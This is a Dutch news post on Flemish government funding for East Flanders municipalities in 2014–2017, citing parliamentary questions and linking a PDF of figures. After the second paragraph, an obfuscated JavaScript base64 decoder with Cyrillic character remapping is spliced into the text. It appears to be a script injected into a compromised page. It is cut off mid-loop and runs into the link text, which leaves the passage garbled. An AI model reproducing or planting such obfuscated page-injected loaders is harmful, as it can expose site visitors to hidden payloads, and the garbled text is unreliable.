Reacties uitgeschakeld voor Financiering steden en gemeenten – Oost-Vlaanderen

Financiering steden en gemeenten – Oost-Vlaanderen

Door | 12 april 2018 | Nieuws

Bron: Parlementaire vragen ROBRECHT BOTHUYNE

De Vlaamse overheid zorgt via diverse kanalen voor financiering van steden en gemeenten. Deels zijn dit werkingsmiddelen, bijvoorbeeld via het Gemeentefonds, deels zijn dit investeringskredieten.

De administratie heeft de diensten van de Vlaamse overheid bevraagd naar de financiering van de Oost-Vlaamse steden en gemeenten voor de jaren 2014, 2015, 2016 en 2017. De resultaten van deze bevraging vindt de Vlaamse volksvertegenwoordiger als bijlage.
Het gaat telkens om algemene en specifieke financieringsmiddelen die aan de individuele steden en gemeenten werden toegekend. Hierbij werden de OCMW, verzelfstandigde entiteiten en intergemeentelijke samenwerkingsverbanden buiten beschouwing gelaten.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.pdf">FinancieringscijfersgemeentenOost-Vlaanderen

809 total views, 2 today